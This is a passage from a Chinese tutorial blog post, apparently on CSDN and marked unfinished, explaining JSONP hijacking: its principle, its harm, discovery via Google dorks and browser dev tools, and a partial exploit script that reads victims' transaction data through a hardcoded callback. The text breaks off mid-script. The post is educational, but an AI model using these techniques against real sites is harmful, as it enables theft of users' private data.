【漏洞利用】JSONP跨域请求漏洞 挖掘、利用详解

本文详细介绍了JSONP跨域请求漏洞的概念、原理、危害,以及挖掘和利用方法,包括回调函数硬编码、动态回调的利用,还探讨了如何绕过Referer检查。此外,还提供了修复防范措施,帮助提升网络安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

参考文章

本片文章仅供学习使用,切勿触犯法律!
未写完,待补充


概述


总结


一、漏洞介绍

JSONP介绍
JSONP 是 JSON with padding(填充式 JSON 或参数式 JSON)的简写。
JSONP是一种利用HTML中<script></script>元素标签,远程调用json文件来实现数据传递的技术,它的特点是可以跨域读取数据。请求动态生成的JS脚本同时带一个callback函数名作为参数。服务端收到请求后,动态生成脚本产生数据,并在代码中以产生的数据为参数调用callback函数。
存在的意义是
绕过诸如同源策略强制执行XMLHttpRequest(AJAX requests)。

实现原理:
![[Pasted image 20210305143800.png]]

流程图:
![[Pasted image 20210305144001.png]]


二、漏洞原理

JSONP劫持,实质上算是一种读类型的CSRF,在恶意的网页中构造恶意的JS代码,当合法用户点击该网页,由于目标站点存在JSONP劫持漏洞的接口,因此会将用户的该接口对应的信息劫持,并将其发送到攻击者的服务器。


三、漏洞危害

  • 获取用户在其他网站的敏感信息。(可用于精准诈骗)

四、利用前提

存在JSONP劫持漏洞的接口。


五、挖掘利用

1、回调函数在响应中进行了硬编码

1.描述

回调函数在响应中进行了硬编码。

2.挖掘

  1. 寻找script类型的并且包含jsonp特征的资源
  • 谷歌语法:site:target.com inurl:?callback
  • 浏览器-开发者工具-网络-搜索关键词(json / jsonp / callback)
  1. 检查响应有无敏感信息
    如:
callback({
	'name':'jack'
})
  1. 检查Referer检验情况

3.利用

a.基础函数调用

myCallback回调函数在响应中进行了硬编码,并以JSON格式的数据进行包装:
![[Pasted image 20210305175213.png]]
可以通过定义myCallback函数,之后再script标签中引用该api进行简单的利用:

<script type="text/javascript">
function myCallback(data){
    
	var transactions = data.transactions.length;
	for (var i = 0; i < transactions; i++){
    
		document.write('the victim <b>' + data.transactions[i].from + '</b> sent <b>' + data.transactions[i].amount + ' ' + data.transactions[i].currensy + '</b> to <b>' + data.transactions[i].to + '</b><br/>');
	}
}
</script>
<script src='http://....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值